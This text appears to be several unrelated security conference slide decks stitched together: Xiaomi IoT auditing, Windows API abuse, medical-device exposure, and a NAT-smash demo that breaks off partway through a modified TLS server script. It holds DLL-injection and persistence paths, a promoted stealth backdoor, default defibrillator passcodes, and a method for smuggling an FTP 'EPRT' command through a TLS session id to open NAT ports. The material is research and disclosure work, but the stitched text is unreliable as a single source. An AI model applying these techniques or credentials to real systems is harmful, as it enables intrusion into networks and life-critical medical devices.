2. 『它』可以繞過目前所有常見的安全防護。
3. 技術量低、成本低。
4. 大腦本身就是一種永遠可以被利用的 0day ( 社交工程手法 ) 。
5. 雲端運算的時代,也意謂著
更強大、更穩健、隨開即用之跨平台惡意程式時代的來臨。
Ant
[email protected]
Building an Automated IoT Security Platform
Who am I? Where do I come from? What am I here to do?
● My name is Meng Zhuo, ID: FengGou
● From the Xiaomi AIoT Security Lab
● Securing Xiaomi-ecosystem smart products and empowering the business
How does the team accomplish its mission?
● Eliminate: eliminate hidden risks
● Prevent: prevent problems before they ignite
● People: grow our people
Eliminating Hidden Risks
Complex tech stack
Technically hard
Talent shortage
Hard to build the team
Surging product volume
Heavy pressure
Industry experience
No established methodology
Facing severe challenges
First Attempts
AIoT consumer-IoT product security baseline
Cross-training the team's skills
Going astray: the lab turns into an assembly-line factory
The "Dual Vector Foil"
The breakthrough of
automated IoT auditing
Business Composition: Peeling Back the Layers
Chip
Application
Module
IPC
Communication
User
APP
IoT
Smart automation
I2X
Flattening to Two Dimensions
Chip interfaces
Ethernet traffic
Wireless traffic
Device services
Control protocols
Firmware analysis
Source-code analysis
Log behavior
Interface fuzzing
APP hooking
Cloud services
Attack-Chain Combinations
LAN
Internet
Local loopback
No authentication
Weak authentication
Strong authentication
Credential leakage
Authentication bypass
Authentication hijacking
RCE
Information disclosure
Denial of service
TARGET : MQTT
RESULT : HIGH
* Data-analysis view of attack-chain distribution
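Crossing the three dimensions above (network position, authentication state, impact) mechanically yields the candidate chains to test. A minimal sketch (the labels mirror the slide; the severity rule is a placeholder for illustration, not the real scoring):

```python
from itertools import product

POSITIONS = ["lan", "internet", "loopback"]
AUTH = ["none", "weak", "strong", "leaked", "bypassed", "hijacked"]
IMPACTS = ["rce", "info-leak", "dos"]

def attack_chains():
    # Cartesian product of the three dimensions = candidate chains to test.
    return list(product(POSITIONS, AUTH, IMPACTS))

def severity(chain):
    # Placeholder triage rule (an assumption, not the platform's real scoring):
    pos, auth, impact = chain
    if impact == "rce" and pos == "internet" and auth in ("none", "bypassed"):
        return "HIGH"
    return "REVIEW"

print(len(attack_chains()))  # 54 combinations
```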
A 24/7 Automated Closed Loop
Discover
Plan the fix
Recheck
Close
Learn
Are you safe once the vulnerabilities are fixed?
This is a huge misconception: security is dynamic. As
technology iterates, product categories diversify, developers
come and go, supply risks shift, and user expectations rise,
it is very hard to find a single "baseline point" that proves a product is secure.
Empowering the Ecosystem
Xiaomi
ecosystem-chain
companies
Third-party
business
partners
Preventing Problems Before They Ignite
Product composition
○ Hardware / chips
○ Sensor modules
○ Operating system
○ Dependency libraries / open-source code
○ Link-layer protocol stacks
Not under our control
○ Application protocol stacks / SDKs
○ Service code / APP
○ Cloud services
○ Account system
Under our control
Xiaomi's Battlefields
AIoT
Connected vehicles / autonomous driving
Robotics / industrial control
Phones / TVs / laptops
"He who fails to think far ahead
will find trouble close at hand."
– The Analects of Confucius
Getting Windows to Play with Itself
A Hacker's Guide to Windows API Abuse
Brady Bloxham
Founder/Principal Security Consultant
@silentbreaksec
http://www.silentbreaksecurity.com
http://www.blacksquirrel.io
Background
• Shorten the gap between penetration test and actual attack
• Few covert persistence tools
• Reduce reliance on Metasploit
Got a lot to cover
• DLL Injection
• Persistence
• Throwback
• Lots of demos along the way
DLL Injection
• Traditional methods
• CreateRemoteThread()
• NtCreateThreadEx()
• RtlCreateUserThread()
• NtQueueApcThread()
• Can blue screen certain OSes
• Code Cave
• Suspend process
• Inject code
• Change EIP to location of injected code
• Resume process
• Difficult on x64
AddMonitor()
• +
• Injects into spoolsv.exe
• Doesn't require matching architecture
• Easy to use
• –
• Dll must be on disk
• Requires administrator privs
Dll Injection Demo
Persistence
• Lots of persistence in Windows
• Service
• Run keys
• Schtasks
• …
• And lots still to find…
• Lots of techniques
• Process monitor
• Hook LoadLibrary()
Persistence
• 1st Technique
• Requires VMware Tools be installed
• Just drop a dll to disk
• c:\windows\system32\wbem\ntdsapi.dll
• Note: Dll must export same functions as real ntdsapi.dll
• 2nd Technique
• VMware patched in ESXi 5.5
• Requires VMware Tools be installed
• Just drop a dll to disk
• c:\windows\system32\wbem\tpgenlic.dll
• c:\windows\system32\wbem\thinmon.dll
Windows Persistence
• 3rd Technique
• HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\
• Create a new key
• Create a new value named Driver with the dll name
• Create as many as you like
Persistence Demo
Windows API HTTP Cheatsheet
• WinHTTP
• Intended for services
• Does not pull user proxy settings
• Supports impersonation
• WinINet
• More robust in proxy environment
• Variety of flags that enable/disable functionality automatically
• Prompts user for password if authentication is required
• Uses IE settings
What is Throwback?
• C++ HTTP/S beaconing backdoor
• PHP control panel w/ MySQL backend
• Built for stealth
• Persistence built-in
• Dll
• Exe
Infected User
Proxy / Firewall
ThrowbackLP
Attacker
ThrowbackLP
Throwback Features
• Robust proxy detection
• Distributed LPs
• Uses MSGRPC to generate MSF payloads
• RC4 encrypted comms
• Implements reflective dll injection
• String encryption
Throwback
Throwback Demo
Going Forward…
• Community based project!!!
• Create modules
• Keylogger, Mimikatz, Hashdump, etc.
• Various transport methods
• Additional persistence techniques
• Modification of comms
The End / Shameless Plug
• Interested in writing custom malware/backdoors?
• Dark Side Ops: Custom Penetration Testing
• Blackhat Europe and East Coast Trainings
• Pen test networks from your browser
• https://www.blacksquirrel.io
• Silent Break Security
• Blackbox/Red Team Pen Testing
• [email protected]
• @silentbreaksec
• https://github.com/silentbreaksec
JUST WHAT THE DOCTOR ORDERED?
SCOTT ERVEN
Founder/President – SecMedic
@scotterven
SHAWN MERDINGER
Healthcare Security Researcher
Founder – MedSec LinkedIn Group
@medseclinkedin
1
Why Research Medical Devices?
• Patient Safety & Quality Patient Care
• To Equip Defenders In Assessing &
Protecting These Life Saving Devices
• Directly Contributes To & Affects Healthcare
Organizations’ Mission and Values
2
Disclosure Process Overview
• April 30th – SMB Findings Disclosed To
DHS/ICS-CERT
• May 5th – SMB Detailed Briefing With
DHS/ICS-CERT
• May 20th – Additional Disclosure To
DHS/ICS-CERT for Defibs, Healthcare Orgs
• Ongoing Assistance Provided To Federal
Agencies, Healthcare Organizations and
Manufacturers
3
What Will Be Revealed?
• No Zero Days
• Most Vulnerabilities Not From This Decade
• Threat Modeling – Connecting The Dots
• Medical Device Exposure From Public
Internet
4
Bad News
• The external findings pose a significant risk to
patient safety and medical devices
• We located most of these external risks within
1 hour utilizing only previously disclosed
vulnerabilities and open source
reconnaissance
• These findings provide support that
Healthcare is 10 years behind other
industries in addressing security
5
Good News
• These significant external risks can be
mitigated easily
• The external risks can be identified by an
organization within 1 hour using open source
reconnaissance tools
• The external findings can be remediated with
little to no investment from an organization
6
Review of Previous Research
• Lab Systems
• Refrigeration Storage
• PACS – Imaging
• MRI/CT
• Implantable Cardiac Defibrillators
• External Cardiac Defibrillators
• Infusion Pumps
• Medical Device Integration
7
Review of Previous Research - Top Risks
• Hard-Coded Privileged Accounts
• Unencrypted Web Applications & Web
Services/Interfaces
• Excessive Services With No Operational Use
Case
• System Updates & Patching
8
Phase II Research – Why Do More?
• Many have been misinformed that medical
devices can not be accessed by an attacker
from the Internet.
– “The biggest vulnerability was the perception of IT health
care professionals’ beliefs that their current perimeter
defenses and compliance strategies were working when
clearly the data states otherwise.” – FBI Advisory April 8th,
2014 PIN#140408-009
• Physicians and public are unaware or have
been misinformed about the risks associated
with these life saving devices.
9
Phase II Research – Why Do More?
• “I have never seen an industry with more
gaping holes. If our financial industry
regarded security the way the health-care
sector does, I would stuff my cash in a
mattress under my bed.”
–
Avi Rubin, Johns Hopkins University 2012/12/25
10
Shodan Search & Initial Finding
• A search for "anesthesia" in Shodan returned
a hit that turned out not to be an anesthesia
workstation at all.
• Realized it was a public facing system with
SMB open, and it was leaking intelligence
about the healthcare organization’s entire
network including medical devices.
11
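Banner triage at this scale is easy to script. The sketch below filters exported scan records for SMB hosts whose banners look medical; every IP, port, and banner here is an invented placeholder, not data from the organization in the talk.

```python
# Hypothetical exported scan records (Shodan-style); all values are invented.
records = [
    {"ip": "203.0.113.10", "port": 445, "banner": "SMB Host: ANESTHESIA-WS01 Domain: HOSP"},
    {"ip": "203.0.113.11", "port": 80,  "banner": "Apache httpd"},
    {"ip": "203.0.113.12", "port": 445, "banner": "SMB Host: RADIOLOGY-PACS Domain: HOSP"},
]

KEYWORDS = ("anesthesia", "pacs", "infusion", "defib")

def triage(records):
    """Return IPs that expose SMB and whose banner looks like a medical system."""
    hits = []
    for r in records:
        if r["port"] == 445 and any(k in r["banner"].lower() for k in KEYWORDS):
            hits.append(r["ip"])
    return hits

print(triage(records))  # -> ['203.0.113.10', '203.0.113.12']
```

The same filter applied to a full export is what turns one accidental Shodan hit into an organization-wide inventory.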
Initial Healthcare Organization Discovery
• Very large US healthcare system with over
12,000 employees and over 3,000 physicians,
including large cardiovascular and
neuroscience institutions.
• Exposed intelligence on over 68,000 systems
and provided direct attack vector to the
systems.
• Exposed numerous connected third-party
organizations and healthcare systems.
12
So Did We Only Find One?
• Of Course Not. We Found Hundreds!!
• Change the search term and many more
come up. Potentially thousands if you include
exposed third-party healthcare systems.
13
Heat Map – Health*
14
Heat Map - Clinic
15
Heat Map - Hospital
16
Heat Map - Medical
17
So Who Cares About SMB Right?
• Well, in many instances it also happened to
be a Windows XP system vulnerable to
MS08-067 (CVE-2008-4250)!!
18
Why Does This Matter?
• It’s A Goldmine For Adversaries & Attackers!!
• It leaks specific information to identify medical
devices and their supporting technology
systems and applications.
• It leaks system hostnames on connected
devices in the network.
• It often leaks floor, office, and physician
name, as well as system timeout exemptions.
19
Let Me Paint The Picture.
Impact:
System May Not Require Login
Impact:
Electronic Medical Record Systems
20
Getting a little warmer!!
Impact: PACS Imaging Systems, MRI/CT Systems
Impact: Infant Abduction Systems
21
This Is Not Good.
Impact:
Pacemaker Controller Systems
Pediatric Nuclear Medicine
Anesthesia Systems
22
OK You Found A Few Devices Right?
• Wrong!!
• We dumped the raw data on the organization
and extracted the following information on
medical devices and their supporting
systems.
• We identified thousands of medical devices
and their supporting systems inside this
organization.
23
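The extraction step described above can be sketched as a simple hostname classifier; the hostnames and naming prefixes below are invented placeholders, not the actual dump data.

```python
# Classify leaked hostnames by device type; sample names are made up.
hostnames = [
    "ANES-OR1", "ANES-OR2", "CARD-ECHO-03", "INFUSION-12",
    "MRI-SUITE-A", "PACS-ARCHIVE-1", "NUCMED-CAM2", "PACEMAKER-CTRL",
]

PREFIXES = {
    "ANES": "Anesthesia", "CARD": "Cardiology", "INFUSION": "Infusion",
    "MRI": "MRI", "PACS": "PACS", "NUCMED": "Nuclear Medicine",
    "PACEMAKER": "Pacemaker",
}

def classify(names):
    """Count hostnames per device category based on their naming prefix."""
    counts = {}
    for name in names:
        for prefix, label in PREFIXES.items():
            if name.startswith(prefix):
                counts[label] = counts.get(label, 0) + 1
                break
    return counts

print(classify(hostnames))
```

Running this kind of classifier over the raw dump is how the per-device-type totals on the next slide were produced.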
Summary Of Devices Inside Organization
• Anesthesia Systems – 21
• Cardiology Systems – 488
• Infusion Systems – 133
• MRI – 97
• PACS Systems – 323
• Nuclear Medicine Systems – 67
• Pacemaker Systems - 31
24
Potential Attacks – Physical Attack
• We know what type of systems and medical
devices are inside the organization.
• We know the healthcare organization and
location.
• We know the floor and office number
• We know if it has a lockout exemption
25
Potential Attacks – Phishing Attack
• We know what type of systems and medical
devices are inside the organization.
• We know the healthcare organization and
employee names.
• We know the hostname of all these devices.
• We can create a custom payload to only
target medical devices and systems with
known vulnerabilities.
26
Potential Attacks – Pivot Attack
• We know the direct public Internet facing
system is vulnerable to MS08-067 and is
Windows XP.
• We know it is touching the backend networks
because it is leaking all the systems it is
connected to.
• We can create a custom payload to pivot to
only targeted medical devices and systems
with known vulnerabilities.
27
Potential Attacks – Targeted Attack
• We can use any of the previous three attack
vectors.
• We now know their Electronic Medical Record
system and server names to attack and gain
unauthorized access. This can tell an
attacker where a patient will be and when.
• We can launch a targeted attack at a specific
location since we know specific rooms these
devices are located in.
28
Disclosure Overview & Results – Big Win!
• DHS/ICS-CERT Coordinated Disclosure
• DHS/ICS-CERT Coordinated Follow-Up Call
With Affected Organization
• Affected Organization Shared Incident
Response Documentation
• First Time DHS/ICS-CERT Had Coordinated
Security Researchers & Healthcare
Organization
29
Are Medical Devices On Public Internet?
• Yes They Are
• In Many Cases It Is By Design
• In Many Cases They Utilize Public Cellular
Carrier Networks
30
So Did We Find Anything Public Facing?
• Defibrillators
• Fetal/Infant Monitoring Systems
• EEG Systems
• PACS/Imaging Systems
31
What Else Was Accessible?
• Healthcare Systems
– Unauthenticated Edge Routers
• Device Manufacturer Infrastructure
• Third-Party Contracted Organizations
32
Case Study – Glucose Meters
• 1st Reported Medical Device On Public IP
– Late 2012
• Roche Glucose Meter
– Basestation Has Telnet Open
• Excellent Vendor Response
• Excellent DHS/ICS-CERT
Response
33
Case Study – Kodak PACS Systems
• Hundreds Sitting On Public IP
• Issues
– Client Connectivity Requires Old Browser
– Internet Explorer 6.0
• Dedicated Client Box Only For This?
34
Case Study – Fetal Monitors
• May 18th – Fetal Monitor Findings Disclosed
To DHS/ICS-CERT, Manufacturer, FDA,
OCR, Joint Commission
• Previous Disclosure
– Dec. 2012 - Fetal monitor findings reported to
DHS ICS-CERT
– Media Coverage
• 3/25/2013
– http://www.wired.com/2013/03/our-health-information/
• 9/5/2013
– http://www.forbes.com/sites/kashmirhill/2013/09/05/the-crazy-things-a-savvy-shodan-searcher-can-find-exposed-on-the-internet/
35
Case Study – 28 Fetal Monitors
• Shodan Map Of Fetal Monitors On Public IP
36
Case Study – Fetal Monitors
• System Details
– Windows 2003 Server
• IIS 6.0 (16 Systems) – Behind On Vendor Updates
– Windows 2008 Server
• IIS 7.0 (12 Systems)
• Remote Access For Physicians/Support
– Remote Desktop Web Access Through Browser
– Terminal Services Clients
• HIPAA Compliant RDP Crypto Access?
37
Case Study – Fetal Monitors
• FDA MAUDE Reports
– Several Cases Of Fetal Alarm Capability Disabled
• Is There Correlation To Exposed Devices?
– Impossible To Tell From MAUDE Alone
• User Submitted Reports
• Sanitized Data
• Attachments Removed
• BTW - MAUDE Reports And Search Interface
Are “Teh Suck”
38
Case Study – Fetal Monitors
• So Where Are We Today?
– I Previously Disclosed This To DHS In Fall 2012
– Many Still On Public IP
– Several Still Running IIS 6.0
• Vendor Did Reach Out
– Conference Call, Interest In Customer Misuse
Cases, Security Researcher Communication
• Lessons Learned
– Need Better Reporting Method
– Need Follow-Up Action
– Need Authority For Location Identification
39
Adversary Misconceptions
• Adversaries Only Care About Financial Gain
– OK Maybe The Russians Do!!
• Adversaries Live In Caves & Can’t Figure It Out
– I Swear Some Ignorant Individual Actually Emailed Me This.
• Adversaries Are Not Technically Adept To Carry Out
An Attack On Medical Devices
– Everything We Just Showed You Requires Little Skill To
Execute. Basic Security Concepts. Open Source
Reconnaissance & Publicly Disclosed Vulnerabilities.
40
Adversaries We Should Worry About
• Terrorists/Extremists
– Especially Technically Adept & Active Adversaries Like ISIS.
• Nation State
– State Sponsored Actors
• Patients Themselves
– Patients Downloaded Documentation, Retrieved Service
Technician Login And Changed Infusion Pump Dosage
• http://austriantimes.at/news/General_News/2012-12-01/45780/Patient_hackers_managed_to_dial_a_drug_in_hospital
41
Adversary Attack Model
• Greatest Risk Is A Combined Attack
– Event Such As Boston Marathon Bombing Or 9/11 In
Conjunction With Attacking Healthcare System Or Power
Plant, etc..
• Really Is That A Risk?
– Our Government Thinks So. You Probably Should Listen.
• CyberCity – Ed Skoudis/Counter Hack
- http://www.washingtonpost.com/investigations/cybercity-allows-government-hackers-to-train-for-attacks/2012/11/26/588f4dae-1244-11e2-be82-c3411b7680a9_story.html
42
Has An Attack Already Happened?
• How Would You Know If A Medical Device Was
Hacked?
– Closed Source Code
– Specialized Diagnostic Equipment, Proprietary Protocols
• Lack Of Forensic Capabilities In Medical Devices
– Lack Of Medical Device Forensic Experts
– Only 2 On LinkedIn, FDA & Ret. FBI
– FDA Only Adjudicates Devices For Generic “Malfunction”
• How Do You Prove An Attack Or Adverse Event
Without Evidence Or Audit Log Trail?
43
Doesn’t HIPAA Protect Us?
It Must Be Ineffective
• Yes I Get These Emails As Well!! I Won’t
Argue The Ineffectiveness!!
• HIPAA Focuses On Privacy Of Patient Data
• HIPAA Does Not Focus On Medical Device
Security
• HIPAA Does Not Focus On Adversary
Resilience Testing And Mitigation
44
Doesn’t FDA, DHS, FBI, HHS, etc..
Protect Us?
• No. It’s Your Responsibility To Secure Your
Environment.
• They Have Told You With Recent Advisories
To Start Testing These Devices And
Assessing Risk.
• ICS-ALERT-13-164-01
• FDA UCM356423
• FBI PIN # 140408-009
45
What Caused These Issues In Healthcare?
• HIPAA Drives Information Security Program &
Budget
• Security Is Not Compliance/Information
Assurance
• Check Box Security Is Not Effective
• Policy Does Not Prevent Adversarial Risks
46
What Caused Issues In Manufacturers?
• Never Had To Design For Adversarial
Threats
• Just Starting To Build Information Security
Teams
• Historically Focused On Regulatory
Compliance Just Like Healthcare
• Haven’t Fully Embraced Partnering With
Security Researchers
47
Common Disconnects With Manufacturers
• Been Told They Can’t Patch/Update Systems
– http://www.fda.gov/medicaldevices/deviceregulationandguidance/guidancedocuments/ucm077812.htm
• Been Told They Can’t Change Hard-Coded
Admin (Support) Accounts
• Biomed – IS/Information Security Integration
• Know Your Manufacturer’s Information
Security Employees – Maintain Relationship
48
Patching Questions
• Yes You Can…But Should You?
• Complex Ecosystem Of Medical Devices
– Leased, 3rd Party Managed, Multi-Vendor
• What If Patch Breaks Medical Device Or
Results In Patient Safety Issue?
– Liability
• Many Healthcare Organizations Reluctant To
Patch Or Modify Medical Devices
49
Anti-Virus Questions
• Several FDA MAUDE Reports Of Negative
Impact
• McAfee DAT 5958 on 21 April, 2010
– svchost.exe Flagged As W32/Wecorl.a Resulted In
Continuous Reboot Of Systems
– 1/3rd Of Hospitals In Rhode Island Impacted
• AV Deleted Fetal Monitor Logs (7 Hours)
– http://hosted.verticalresponse.com/250140/86af97f052/
50
Solutions & Recommendations
• External Attack Surface Reduction & Hardening
• Recognize & Mitigate Your Exposure To Tools Like
Shodan
– Shodan API = Automation
– Needs Continual Monitoring, Roll Your Own
– Other Fast Scanning Tools: Masscan, ZMAP
• Make Your External Perimeter Metasploit Proof
– Yes You Actually Have To Use Metasploit
51
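The "roll your own" continual monitoring above boils down to diffing successive scan results and alerting on new exposure. A minimal sketch, with placeholder host:port sets standing in for real output from the Shodan API, masscan, or zmap:

```python
# Diff the host:port set from the latest external scan against the previous
# run. All addresses below are placeholder values, not real scan output.
previous = {"198.51.100.5:445", "198.51.100.9:80"}
current  = {"198.51.100.5:445", "198.51.100.9:80", "198.51.100.21:3389"}

newly_exposed = sorted(current - previous)  # alert on these
remediated = sorted(previous - current)     # confirm these were intentional

print("new exposure:", newly_exposed)
print("closed since last run:", remediated)
```

Scheduling this diff after each scan run is the whole "continual" part; anything in `newly_exposed` is a change to the external attack surface that someone should explain.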
Solutions & Recommendations
• Stop The Bleeding
– Remove SMB Services
• Adversarial Resilience Testing
– Red Teaming
– Harden Edge Devices To Applicable NIST Standards
52
Needs From Healthcare Industry
• Internal programs focused on medical device
security to include device security testing
• Require security testing during vendor
selection and procurement process
• Work to show organization you are
supporting their mission and values
53
Needs From Healthcare Industry
• Request MDS2 Forms From Vendors
– Incorporate Into Contract With Penalties
• Responsibly Disclose Findings To
Manufacturer, FDA, DHS/ICS-CERT
– Possibly HHS OCR, FBI, FTC
• Demand Vulnerabilities Are Remediated
– Incorporate Into Contract With Penalties
– Incorporate Indemnification Clauses Into Contract
54
Recommended Disclosure Reporting
• Individual Researchers
– DHS/ICS-CERT
– FDA
– Manufacturer – If Possible
– CVE, OSVDB If Appropriate
• Healthcare Organizations
– Manufacturer
– DHS/ICS-CERT
– FDA
– CVE, OSVDB If Appropriate
55
Accessibility Of Medical Devices
• Difficult To Get Hands On Medical Devices
– Many Devices Are Rx Only
– Many Devices Are Very Expensive
• Independent Research Options
– Ebay or MEDWOW (Can Be End-Of-Life, Recalled)
– Hack Your Own Device
• Consultant
– Most Often End Up Under NDA
– Starting To See Non-Identifiable Data Clauses
56
Do You Really Need The Medical Device?
• Use Search Engines To Locate Service
Manuals
– Contain Detailed Systems & Operations
Information
– Contain Support Or Service Technician Login
Information
– Contain Detailed Architecture & Schematics
57
Case Study – Defibrillators
• Located Zoll X Series Defibrillators On Public
IP Space
58
Case Study – Defibrillators
• You Need A Certificate For Web Interface.
– Thank God It’s On The Landing Page!!!!
59
Case Study – Defibrillators
• Defibrillator Also Is First To Market With
Integrated Wireless & Bluetooth Interfaces
– By Design Of Course
60
Case Study – Defibrillators
• Wireless & Bluetooth Interfaces Also Have
Direct Access To Communications Processor
– Utilizes UART Interface
61
Case Study – Defibrillators
• Communications Processor Must Be
Separated Completely From Main Monitor
Board Right?
– Debug Is Located On GPS UART On CP
– Schematics Show Communication Back To Main
Monitor Board As Well
– Note USB On Same Circuit Back To Main Board
62
Case Study – Defibrillators
• In Order To Import Configuration You Utilize
USB With A File Named ZollConfig.xml
63
Case Study – Defibrillators
• Critical Configuration Values
• Alarm Parameters
64
Case Study – Defibrillators
• Default Patient Mode
• Factory Reset
65
Case Study – Defibrillators
• Supervisor Access
• Supervisor Mode Config Settings
66
Case Study – Defibrillators
• Supervisor Default Login
• Clearing Logs
67
Case Study – Defibrillators
• So Who Thinks This Is A Secure Design?
• So Is This A Problem In Only One Product
Line?
– Of Course Not
68
Case Study – Defibrillators
• Zoll M Series Defibrillator
– System Config – 00000000
• Zoll R Series Defibrillator/Monitor
– System Config – 00000000
• Zoll E Series Defibrillator/Monitor
– System Config – 00000000
• Zoll X Series Defibrillator/Monitor
– Supervisor Passcode – 1234
– Service Passcode - 1234
69
How Are Vendors Changing?
• They Have Started Talking To Researchers
• Owlet Baby Care – Huge Shout Out!!
– Stepped Up And Is Letting Us Test Security Of Device Prior
To Market
– Recognizes Patient Safety Concerns Due To Security
Vulnerabilities
• Philips Healthcare Released Responsible Disclosure
Positioning
70
November 01, 2013 _Sector Confidential
71
Philips Healthcare
Responsible Disclosure
Positioning
Product Security & Services Office
Philips Healthcare
August 2014
72
Philips Healthcare Responsible Disclosure Positioning
•
Philips Healthcare and Responsible Disclosure
•
Philips Healthcare recognizes the need for a clear Responsible Disclosure Policy and protocols as part
of its Product Security function.
•
The company is developing a Responsible Disclosure Policy according to current industry best
practices.
– The policy will be publicly accessible, with clear communications channels for customers,
researchers and other security community stakeholders.
– The policy will be based on principles of transparency, accountability and responsiveness.
– The policy will outline defined protocols for reporting and response, managed by the Philips
Product Security Team.
The policy protocols will encompass:
•
Monitoring and response of inbound communications
•
Managing confirmation receipt and follow-up communication with senders
•
Evaluation of vulnerability notifications and status tracking
•
Alignment with incident response, stakeholder notification, remediation and prevention
protocols as required
•
Philips has actively sought out researcher and analyst input to help guide policy design and
projected implementation.
– The company has increasingly engaged with the security research community over the past year.
– Philips is committed to ongoing dialogue with the security community and to productive
partnerships.
How To Help?
• Looking For Android/iOS Security Researchers To
Collaborate On Healthcare Application Security
• Seeking Collaboration With Physicians & Patients
73
Gr33tz
• Barnaby Jack
• John Matherly
• Terry McCorkle
• Jay Radcliffe
• Billy Rios
• DHS/ICS-CERT
• FDA/HHS/CDRH
• FBI
• Roche Diagnostics
• Philips Healthcare
74
Contact Info
• Scott Erven
– @scotterven
– @secmedic
– [email protected]
• Shawn Merdinger
– @medseclinkedin
– [email protected]
75 | pdf |
NAT smash demo

0x00 How it works
1. The victim opens an HTTPS connection; the TLS ClientHello carries a session id.
2. The session id is chosen by the client side, so a payload can be embedded in it.
3. The server caches the session id and sends it back during the handshake.
4. The client is then redirected to a second "HTTPS" service on an ALG-inspected port.
5. When the client resumes the TLS session there, it re-sends the same session id, in cleartext, on the new connection.
6. The NAT's FTP ALG inspects that stream and sees the session id bytes.
7. A small advertised TCP window forces the session id onto a segment boundary, so the ALG parses the embedded FTP command.
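A minimal sketch of steps 1–2: the session id in a ClientHello is an opaque field of up to 32 bytes chosen by the client, so a short FTP command fits inside it. The IP and port below are placeholders.

```python
# The smuggled payload must fit in the 32-byte TLS session id field.
# IP and port are placeholder values for illustration.
payload = b"\nEPRT |1|203.0.113.7|4444|\n"
assert len(payload) <= 32  # must fit inside the session id

session_id = payload.ljust(32, b"\x00")  # pad to the full 32-byte field
print(len(session_id), session_id)
```

On session resumption the client repeats these exact bytes on the wire, which is what makes the payload reappear in cleartext on the second connection.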
0x01 Preparation
1. Use scapy to hand-craft the TCP handshake and ACKs for the fake service.
2. Use https://github.com/tlsfuzzer/tlslite-ng, wendell's modified pure-Python TLS library. The changes live in tlslite/tlsconnection.py (after a pip install: /usr/local/lib/python3.8/dist-packages/tlslite/tlsconnection.py).

The modified HTTPS server plants the payload in the TLS session id it hands to clients.
The payload is "\nEPRT |1|IP|port|", and the TCP window is set to 32, the size of the session id field.
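Why the 32-byte window matters can be shown by slicing a byte stream into window-sized segments: with the right padding, the smuggled EPRT line begins exactly at a segment boundary, where an FTP ALG treats it as a fresh command line. The surrounding bytes here are made up.

```python
# With 32-byte segments, padding the preceding traffic to a multiple of the
# window makes the EPRT command start a fresh segment. Placeholder bytes.
WINDOW = 32
prefix = b"A" * 32                       # stand-in for handshake bytes before the payload
payload = b"\nEPRT |1|203.0.113.7|4444|\n"
stream = prefix + payload

segments = [stream[i:i + WINDOW] for i in range(0, len(stream), WINDOW)]
print(segments[1])  # second segment starts with the EPRT command
```

The scapy script below enforces this segmentation on the real connection by advertising the small window in its SYN+ACK.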
0x02 Demo flow
1. The victim connects to the attacker's HTTPS server, which negotiates a TLS session id containing the payload; the next hop is port 21.
2. The server answers with a 302 redirect, so the client reconnects to port 21 and re-sends the same session id while resuming the session.
3. Port 21 is answered by scapy advertising a small TCP window, not by a real HTTPS server.
4. The scapy script replies to the client's SYN with a SYN+ACK carrying the small window, then ACKs the pushed segments step by step (advancing seq/ack by the window size) until the NAT's FTP ALG sees the EPRT command and opens the port.
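The FTP ALG is what turns the smuggled text into an open port: on seeing an EPRT command (RFC 2428) on what it believes is an FTP control connection, it parses the address and creates a NAT mapping. A toy model of that parsing step, with placeholder values:

```python
import re

# Toy model of what an FTP ALG extracts from an EPRT command (RFC 2428):
# "EPRT |1|<ipv4>|<port>|" -> (IP, TCP port). Values are placeholders.
def parse_eprt(line):
    m = re.match(r"EPRT \|1\|([\d.]+)\|(\d+)\|", line)
    if not m:
        return None
    return m.group(1), int(m.group(2))

print(parse_eprt("EPRT |1|203.0.113.7|4444|"))  # -> ('203.0.113.7', 4444)
```

A real ALG then forwards inbound connections to that IP and port through the NAT, which is exactly the hole the demo opens.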
Tips: the client must reuse the TLS session so that the same session id is sent on both the first and the second connection (Java's HttpURLConnection behaves this way). After the first handshake, the real HTTPS listener is shut down so that only the scapy script answers on port 21. The redirect toward port 21 can also be reached through SSRF.
0x03 Environment
The HTTPS server comes from the tlslite-ng repository on GitHub:
"To run an HTTPS server with less typing, run ./tests/httpsserver.sh."
https://github.com/tlsfuzzer/tlslite-ng/blob/master/tests/httpsserver.sh
httpsserver.sh wraps scripts/tls.py; change the redirect URL and the IP addresses in the scripts below to match your own setup.

natsmash-tlsserver1.py

The modified HTTPS server: do_GET issues the 302 redirect that bounces the client toward the fake service, and the server shuts itself down after the first handshake.
#!/usr/bin/python3
# Authors:
# Trevor Perrin
# Marcelo Fernandez - bugfix and NPN support
# Martin von Loewis - python 3 port
#
# See the LICENSE file for legal information regarding use of this file.
from __future__ import print_function
import sys
import os
import os.path
import socket
import time
import getopt
import binascii
import _thread
from scapy.all import *
try:
import httplib
from SocketServer import *
from BaseHTTPServer import *
from SimpleHTTPServer import *
except ImportError:
# Python 3.x
from http import client as httplib
from socketserver import *
from http.server import *
from http.server import SimpleHTTPRequestHandler
if __name__ != "__main__":
raise "This must be run as a command, not used as a module!"
from tlslite.api import *
from tlslite.constants import CipherSuite, HashAlgorithm, SignatureAlgorithm, \
GroupName, SignatureScheme
from tlslite import __version__
from tlslite.utils.compat import b2a_hex
from tlslite.utils.dns_utils import is_valid_hostname
try:
from tack.structures.Tack import Tack
except ImportError:
pass
def printUsage(s=None):
if s:
print("ERROR: %s" % s)
print("")
print("Version: %s" % __version__)
print("")
print("RNG: %s" % prngName)
print("")
print("Modules:")
if tackpyLoaded:
print(" tackpy : Loaded")
else:
print(" tackpy : Not Loaded")
if m2cryptoLoaded:
print(" M2Crypto : Loaded")
else:
print(" M2Crypto : Not Loaded")
if pycryptoLoaded:
print(" pycrypto : Loaded")
else:
print(" pycrypto : Not Loaded")
if gmpyLoaded:
print(" GMPY : Loaded")
else:
print(" GMPY : Not Loaded")
print("")
print("""Commands:
server
[-k KEY] [-c CERT] [-t TACK] [-v VERIFIERDB] [-d DIR] [-l LABEL] [-L LENGTH]
[--reqcert] [--param DHFILE] HOST:PORT
client
[-k KEY] [-c CERT] [-u USER] [-p PASS] [-l LABEL] [-L LENGTH] [-a ALPN]
HOST:PORT
LABEL - TLS exporter label
LENGTH - amount of info to export using TLS exporter
ALPN - name of protocol for ALPN negotiation, can be present multiple times
in client to specify multiple protocols supported
DHFILE - file that includes Diffie-Hellman parameters to be used with DHE
key exchange
""")
sys.exit(-1)
def printError(s):
"""Print error message and exit"""
sys.stderr.write("ERROR: %s\n" % s)
sys.exit(-1)
def handleArgs(argv, argString, flagsList=[]):
# Convert to getopt argstring format:
# Add ":" after each arg, ie "abc" -> "a:b:c:"
getOptArgString = ":".join(argString) + ":"
try:
opts, argv = getopt.getopt(argv, getOptArgString, flagsList)
except getopt.GetoptError as e:
printError(e)
# Default values if arg not present
privateKey = None
certChain = None
username = None
password = None
tacks = None
verifierDB = None
reqCert = False
directory = None
expLabel = None
expLength = 20
